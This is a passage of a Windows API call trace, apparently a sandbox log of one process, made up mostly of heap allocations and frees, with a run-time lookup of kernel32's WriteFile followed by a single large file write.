(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0172.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.755] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0172.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba168 [0172.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba168, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.755] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.756] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x14707, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x14707, lpOverlapped=0x0) returned 1 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.759] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: 